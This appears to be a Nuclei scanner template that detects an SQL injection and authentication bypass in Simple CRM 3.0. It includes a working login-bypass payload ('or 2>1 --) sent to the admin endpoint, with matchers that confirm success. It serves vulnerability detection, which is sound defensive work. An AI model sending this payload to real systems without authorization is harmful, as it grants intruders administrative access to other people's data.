nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml

39 lines
953 B
YAML

id: simple-crm-sql-injection
info:
name: Simple CRM 3.0 SQL Injection and Authentication Bypass
author: geeknik
severity: critical
description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities.
reference:
- https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
tags: packetstorm,sqli,simplecrm,auth-bypass,injection
requests:
- method: POST
path:
- "{{BaseURL}}/scrm/crm/admin"
body: "email='+or+2>1+--+&password=&login="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>window.location.href='home.php'</script>"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/03/30